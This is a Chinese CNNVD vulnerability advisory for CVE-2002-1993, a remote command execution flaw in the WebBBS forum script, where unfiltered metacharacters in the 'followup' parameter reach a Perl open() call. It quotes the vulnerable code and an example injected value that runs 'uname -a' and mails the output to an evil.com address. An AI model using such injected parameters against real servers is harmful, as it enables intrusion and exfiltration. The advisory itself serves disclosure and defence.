漏洞信息详情
WebScripts WebBBS远程命令执行漏洞
- CNNVD编号:CNNVD-200212-234
- 危害等级: 超危
- CVE编号:
CVE-2002-1993
- 漏洞类型:
输入验证
- 发布时间:
2002-06-18
- 威胁类型:
远程
- 更新时间:
2006-09-22
- 厂 商:
affordable_web_space_design - 漏洞来源:
nerf gr0up nerf※ v… -
漏洞简介
WebBBS是一款由Darryl Burgdorf维护的基于WEB的论坛程序,以简单文本文件存储信息。
WebBBS脚本对用户提交的输入缺少正确的过滤,远程攻击者可以利用这个漏洞以WEB进程的权限在系统上执行任意命令。
WebBBS没有正确过滤来自CGI参数上的元字符,攻击者可以提交包含\”;\”或者\”|\”等元字符来执行额外命令,问题存在于webbbs_post.pl脚本中:
if ($FORM{\’\’followup\’\’}) { $followup =
\”$FORM{\’\’followup\’\’}\”; }
…
if ($followup) {
…
$subdir = \”bbs\”.int($followup/1000);
open
(FOLLOWUP,\”$dir/$subdir/$followup\”);
…
使用如\”followup=10;uname -a|mail zlo@evil.com|\”代替\”followup=10\”变量就可能以WEB权限在系统上执行任意命令。
漏洞公告
临时解决方法:
如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
* 修改程序,严格过滤用户输入数据。
厂商补丁:
WebScripts
———-
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://awsd.com/scripts/webbbs/” target=”_blank”>
http://awsd.com/scripts/webbbs/
参考网址
来源: BID
名称: 5048
链接:http://www.securityfocus.com/bid/5048
来源: XF
名称: webbs-followup-execute-commands(9378)
链接:http://www.iss.net/security_center/static/9378.php
来源: BUGTRAQ
名称: 20020618 WebBBS 5.0 (andlater versions) vulnerable: allow commands execution via “followup” bug
链接:http://cert.uni-stuttgart.de/archive/bugtraq/2002/06/msg00232.html
来源:NSFOCUS
名称:3018
链接:http://www.nsfocus.net/vulndb/3018
受影响实体